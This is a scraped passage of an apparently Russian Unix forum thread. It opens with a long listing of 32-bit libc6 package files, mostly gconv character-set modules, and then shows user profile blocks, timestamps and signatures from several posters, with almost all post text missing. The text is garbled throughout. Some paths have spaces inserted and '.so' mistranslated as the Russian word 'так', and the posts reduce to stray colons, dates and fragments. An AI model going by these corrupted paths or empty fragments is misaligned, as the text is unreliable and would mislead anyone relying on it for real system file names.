/usr/lib/i386-linux-gnu/gconv/EBCDIC-IT.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-PT.so
/ usr / lib / i386-linux-gnu / gconv / EBCDIC-UK.так
/usr/lib/i386-linux-gnu/gconv/EBCDIC-US.so
/usr/lib/i386-linux-gnu/gconv/ECMA-CYRILLIC.so
/usr/lib/i386-linux-gnu/gconv/EUC-CN.so
/usr/lib/i386-linux-gnu/gconv/EUC-JISX0213.so
/usr/lib/i386-linux-gnu/gconv/EUC-JP-MS.so
/usr/lib/i386-linux-gnu/gconv/EUC-JP.so
/usr/lib/i386-linux-gnu/gconv/EUC-KR.so
/ usr / lib / i386-linux-gnu / gconv / EUC-TW.так
/usr/lib/i386-linux-gnu/gconv/GB18030.so
/usr/lib/i386-linux-gnu/gconv/GBBIG5.so
/usr/lib/i386-linux-gnu/gconv/GBGBK.so
/usr/lib/i386-linux-gnu/gconv/GBK.so
/usr/lib/i386-linux-gnu/gconv/GEORGIAN-ACADEMY.so
/usr/lib/i386-linux-gnu/gconv/GEORGIAN-PS.so
/usr/lib/i386-linux-gnu/gconv/GOST_19768-74.so
/ usr / lib / i386-linux-gnu / gconv / GREEK-CCITT.так
/usr/lib/i386-linux-gnu/gconv/GREEK7-OLD.so
/usr/lib/i386-linux-gnu/gconv/GREEK7.so
/usr/lib/i386-linux-gnu/gconv/HP-GREEK8.so
/usr/lib/i386-linux-gnu/gconv/HP-ROMAN8.so
/usr/lib/i386-linux-gnu/gconv/HP-ROMAN9.so
/usr/lib/i386-linux-gnu/gconv/HP-THAI8.so
/usr/lib/i386-linux-gnu/gconv/HP-TURKISH8.so
/ usr / lib / i386-linux-gnu / gconv / IBM037.так
/usr/lib/i386-linux-gnu/gconv/IBM038.so
/usr/lib/i386-linux-gnu/gconv/IBM1004.so
/usr/lib/i386-linux-gnu/gconv/IBM1008.so
/usr/lib/i386-linux-gnu/gconv/IBM1008_420.so
/usr/lib/i386-linux-gnu/gconv/IBM1025.so
/usr/lib/i386-linux-gnu/gconv/IBM1026.so
/usr/lib/i386-linux-gnu/gconv/IBM1046.so
/ usr / lib / i386-linux-gnu / gconv / IBM1047.так
/usr/lib/i386-linux-gnu/gconv/IBM1097.so
/usr/lib/i386-linux-gnu/gconv/IBM1112.so
/usr/lib/i386-linux-gnu/gconv/IBM1122.so
/usr/lib/i386-linux-gnu/gconv/IBM1123.so
/usr/lib/i386-linux-gnu/gconv/IBM1124.so
/usr/lib/i386-linux-gnu/gconv/IBM1129.so
/usr/lib/i386-linux-gnu/gconv/IBM1130.so
/ usr / lib / i386-linux-gnu / gconv / IBM1132.так
/usr/lib/i386-linux-gnu/gconv/IBM1133.so
/usr/lib/i386-linux-gnu/gconv/IBM1137.so
/usr/lib/i386-linux-gnu/gconv/IBM1140.so
/usr/lib/i386-linux-gnu/gconv/IBM1141.so
/usr/lib/i386-linux-gnu/gconv/IBM1142.so
/usr/lib/i386-linux-gnu/gconv/IBM1143.so
/usr/lib/i386-linux-gnu/gconv/IBM1144.so
/ usr / lib / i386-linux-gnu / gconv / IBM1145.так
/usr/lib/i386-linux-gnu/gconv/IBM1146.so
/usr/lib/i386-linux-gnu/gconv/IBM1147.so
/usr/lib/i386-linux-gnu/gconv/IBM1148.so
/usr/lib/i386-linux-gnu/gconv/IBM1149.so
/usr/lib/i386-linux-gnu/gconv/IBM1153.so
/usr/lib/i386-linux-gnu/gconv/IBM1154.so
/usr/lib/i386-linux-gnu/gconv/IBM1155.so
/ usr / lib / i386-linux-gnu / gconv / IBM1156.так
/usr/lib/i386-linux-gnu/gconv/IBM1157.so
/usr/lib/i386-linux-gnu/gconv/IBM1158.so
/usr/lib/i386-linux-gnu/gconv/IBM1160.so
/usr/lib/i386-linux-gnu/gconv/IBM1161.so
/usr/lib/i386-linux-gnu/gconv/IBM1162.so
/usr/lib/i386-linux-gnu/gconv/IBM1163.so
/usr/lib/i386-linux-gnu/gconv/IBM1164.so
/ usr / lib / i386-linux-gnu / gconv / IBM1166.так
/usr/lib/i386-linux-gnu/gconv/IBM1167.so
/usr/lib/i386-linux-gnu/gconv/IBM12712.so
/usr/lib/i386-linux-gnu/gconv/IBM1364.so
/usr/lib/i386-linux-gnu/gconv/IBM1371.so
/usr/lib/i386-linux-gnu/gconv/IBM1388.so
/usr/lib/i386-linux-gnu/gconv/IBM1390.so
/usr/lib/i386-linux-gnu/gconv/IBM1399.so
/ usr / lib / i386-linux-gnu / gconv / IBM16804.так
/usr/lib/i386-linux-gnu/gconv/IBM256.so
/usr/lib/i386-linux-gnu/gconv/IBM273.so
/usr/lib/i386-linux-gnu/gconv/IBM274.so
/usr/lib/i386-linux-gnu/gconv/IBM275.so
/usr/lib/i386-linux-gnu/gconv/IBM277.so
/usr/lib/i386-linux-gnu/gconv/IBM278.so
/usr/lib/i386-linux-gnu/gconv/IBM280.so
/ usr / lib / i386-linux-gnu / gconv / IBM281.так
/usr/lib/i386-linux-gnu/gconv/IBM284.so
/usr/lib/i386-linux-gnu/gconv/IBM285.so
/usr/lib/i386-linux-gnu/gconv/IBM290.so
/usr/lib/i386-linux-gnu/gconv/IBM297.so
/usr/lib/i386-linux-gnu/gconv/IBM420.so
/usr/lib/i386-linux-gnu/gconv/IBM423.so
/usr/lib/i386-linux-gnu/gconv/IBM424.so
/ usr / lib / i386-linux-gnu / gconv / IBM437.так
/usr/lib/i386-linux-gnu/gconv/IBM4517.so
/usr/lib/i386-linux-gnu/gconv/IBM4899.so
/usr/lib/i386-linux-gnu/gconv/IBM4909.so
/usr/lib/i386-linux-gnu/gconv/IBM4971.so
/usr/lib/i386-linux-gnu/gconv/IBM500.so
/usr/lib/i386-linux-gnu/gconv/IBM5347.so
/usr/lib/i386-linux-gnu/gconv/IBM803.so
/ usr / lib / i386-linux-gnu / gconv / IBM850.так
/usr/lib/i386-linux-gnu/gconv/IBM851.so
/usr/lib/i386-linux-gnu/gconv/IBM852.so
/usr/lib/i386-linux-gnu/gconv/IBM855.so
/usr/lib/i386-linux-gnu/gconv/IBM856.so
/usr/lib/i386-linux-gnu/gconv/IBM857.so
/usr/lib/i386-linux-gnu/gconv/IBM858.so
/usr/lib/i386-linux-gnu/gconv/IBM860.so
/ usr / lib / i386-linux-gnu / gconv / IBM861.так
/usr/lib/i386-linux-gnu/gconv/IBM862.so
/usr/lib/i386-linux-gnu/gconv/IBM863.so
/usr/lib/i386-linux-gnu/gconv/IBM864.so
/usr/lib/i386-linux-gnu/gconv/IBM865.so
/usr/lib/i386-linux-gnu/gconv/IBM866.so
/usr/lib/i386-linux-gnu/gconv/IBM866NAV.so
/usr/lib/i386-linux-gnu/gconv/IBM868.so
/ usr / lib / i386-linux-gnu / gconv / IBM869.так
/usr/lib/i386-linux-gnu/gconv/IBM870.so
/usr/lib/i386-linux-gnu/gconv/IBM871.so
/usr/lib/i386-linux-gnu/gconv/IBM874.so
/usr/lib/i386-linux-gnu/gconv/IBM875.so
/usr/lib/i386-linux-gnu/gconv/IBM880.so
/usr/lib/i386-linux-gnu/gconv/IBM891.so
/usr/lib/i386-linux-gnu/gconv/IBM901.so
/ usr / lib / i386-linux-gnu / gconv / IBM902.так
/usr/lib/i386-linux-gnu/gconv/IBM903.so
/usr/lib/i386-linux-gnu/gconv/IBM9030.so
/usr/lib/i386-linux-gnu/gconv/IBM904.so
/usr/lib/i386-linux-gnu/gconv/IBM905.so
/usr/lib/i386-linux-gnu/gconv/IBM9066.so
/usr/lib/i386-linux-gnu/gconv/IBM918.so
/usr/lib/i386-linux-gnu/gconv/IBM921.so
/ usr / lib / i386-linux-gnu / gconv / IBM922.так
/usr/lib/i386-linux-gnu/gconv/IBM930.so
/usr/lib/i386-linux-gnu/gconv/IBM932.so
/usr/lib/i386-linux-gnu/gconv/IBM933.so
/usr/lib/i386-linux-gnu/gconv/IBM935.so
/usr/lib/i386-linux-gnu/gconv/IBM937.so
/usr/lib/i386-linux-gnu/gconv/IBM939.so
/usr/lib/i386-linux-gnu/gconv/IBM943.so
/ usr / lib / i386-linux-gnu / gconv / IBM9448.так
/usr/lib/i386-linux-gnu/gconv/IEC_P27-1.so
/usr/lib/i386-linux-gnu/gconv/INIS-8.so
/usr/lib/i386-linux-gnu/gconv/INIS-CYRILLIC.so
/usr/lib/i386-linux-gnu/gconv/INIS.so
/usr/lib/i386-linux-gnu/gconv/ISIRI-3342.so
/usr/lib/i386-linux-gnu/gconv/ISO-2022-CN-EXT.so
/ usr / lib / i386-linux-gnu / gconv / ISO-2022-CN.так
/usr/lib/i386-linux-gnu/gconv/ISO-2022-JP-3.so
/usr/lib/i386-linux-gnu/gconv/ISO-2022-JP.so
/usr/lib/i386-linux-gnu/gconv/ISO-2022-KR.so
/usr/lib/i386-linux-gnu/gconv/ISO-IR-197.so
/usr/lib/i386-linux-gnu/gconv/ISO-IR-209.so
/usr/lib/i386-linux-gnu/gconv/ISO646.so
/ usr / lib / i386-linux-gnu / gconv / ISO8859-1.так
/usr/lib/i386-linux-gnu/gconv/ISO8859-10.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-11.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-13.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-14.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-15.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-16.so
/ usr / lib / i386-linux-gnu / gconv / ISO8859-2.так
/usr/lib/i386-linux-gnu/gconv/ISO8859-3.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-4.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-5.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-6.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-7.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-8.so
/usr/lib/i386-linux-gnu/gconv/ISO8859-9.so
/ usr / lib / i386-linux-gnu / gconv / ISO8859-9E.так
/usr/lib/i386-linux-gnu/gconv/ISO_10367-BOX.so
/usr/lib/i386-linux-gnu/gconv/ISO_11548-1.so
/usr/lib/i386-linux-gnu/gconv/ISO_2033.so
/usr/lib/i386-linux-gnu/gconv/ISO_5427-EXT.so
/usr/lib/i386-linux-gnu/gconv/ISO_5427.so
/usr/lib/i386-linux-gnu/gconv/ISO_5428.so
/ usr / lib / i386-linux-gnu / gconv / ISO_6937-2.так
/usr/lib/i386-linux-gnu/gconv/ISO_6937.so
/usr/lib/i386-linux-gnu/gconv/JOHAB.so
/usr/lib/i386-linux-gnu/gconv/KOI-8.so
/usr/lib/i386-linux-gnu/gconv/KOI8-R.so
/usr/lib/i386-linux-gnu/gconv/KOI8-RU.so
/usr/lib/i386-linux-gnu/gconv/KOI8-T.so
/usr/lib/i386-linux-gnu/gconv/KOI8-U.so
/ usr / lib / i386-linux-gnu / gconv / LATIN-GREEK-1.так
/usr/lib/i386-linux-gnu/gconv/LATIN-GREEK.so
/usr/lib/i386-linux-gnu/gconv/MAC-CENTRALEUROPE.so
/usr/lib/i386-linux-gnu/gconv/MAC-IS.so
/usr/lib/i386-linux-gnu/gconv/MAC-SAMI.so
/usr/lib/i386-linux-gnu/gconv/MAC-UK.so
/usr/lib/i386-linux-gnu/gconv/MACINTOSH.so
/usr/lib/i386-linux-gnu/gconv/MIK.so
/ usr / lib / i386-linux-gnu / gconv / NATS-DANO.так
/usr/lib/i386-linux-gnu/gconv/NATS-SEFI.so
/usr/lib/i386-linux-gnu/gconv/PT154.so
/usr/lib/i386-linux-gnu/gconv/RK1048.so
/usr/lib/i386-linux-gnu/gconv/SAMI-WS2.so
/usr/lib/i386-linux-gnu/gconv/SHIFT_JISX0213.so
/usr/lib/i386-linux-gnu/gconv/SJIS.so
/usr/lib/i386-linux-gnu/gconv/T.61.so
/ usr / lib / i386-linux-gnu / gconv / TCVN5712-1.так
/usr/lib/i386-linux-gnu/gconv/TIS-620.so
/usr/lib/i386-linux-gnu/gconv/TSCII.so
/usr/lib/i386-linux-gnu/gconv/UHC.so
/usr/lib/i386-linux-gnu/gconv/UNICODE.so
/usr/lib/i386-linux-gnu/gconv/UTF-16.so
/usr/lib/i386-linux-gnu/gconv/UTF-32.so
/usr/lib/i386-linux-gnu/gconv/UTF-7.so
/ usr / lib / i386-linux-gnu / gconv / VISCII.так
/ usr / lib / i386-linux-gnu / gconv / gconv-modules
/usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
/usr/lib/i386-linux-gnu/gconv/libCNS.so
/usr/lib/i386-linux-gnu/gconv/libGB.so
/usr/lib/i386-linux-gnu/gconv/libISOIR165.so
/usr/lib/i386-linux-gnu/gconv/libJIS.so
/usr/lib/i386-linux-gnu/gconv/libJISX0213.so
/ usr / lib / i386-linux-gnu / gconv / libKSC.так
/usr/share/doc/libc6/NEWS.Debian.gz
/usr/share/doc/libc6/NEWS.gz
/usr/share/doc/libc6/README.Debian.gz
/usr/share/doc/libc6/README.hesiod.gz
/usr/share/doc/libc6/changelog.Debian.gz
/usr/share/doc/libc6/changelog.gz
/ usr / share / doc / libc6 / copyright
/ usr / share / lintian / overrides / libc6

.

i686: 32 64

MrGukk

: 25.11.2009
#: 83428
: 53

: 13, 2012 16:01: i686: 32 64

!

MrGukk

: 25.11.2009
#: 83428
: 53

: 13, 2012 16:02:

Drunky
Гуру виртуализации

: 06.12.2006
#: 47,676
: 15731
: На дне бутылки

: 165

: 13, 2012 16:12:

lavr
Unix guru

: 13.05.2003
#: 5,821
: 8684

: 79

: 13, 2012 16:47:

_________________
Удачи,



лавр
MrGukk

: 25.11.2009
#: 83428
: 53

: 13, 2012 17:09:

Drunky
Гуру виртуализации

: 06.12.2006
#: 47,676
: 15731
: На дне бутылки

: 165

: 13, 2012 17:42:

MrGukk

: 25.11.2009
#: 83428
: 53

: 13, 2012 17:52:

vlaryk
Networks Guru

: 28.01.2009
#: 75,624
: 8484
:

: 157

: 13, 2012 17:54:

_________________
, «», «»

Windows!
Drunky
Гуру виртуализации

: 06.12.2006
#: 47,676
: 15731
: На дне бутылки

: 165

: 13, 2012 17:58:

MrGukk

: 25.11.2009
#: 83428
: 53

: 13, 2012 19:08:

!
.
optimism.ru

.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *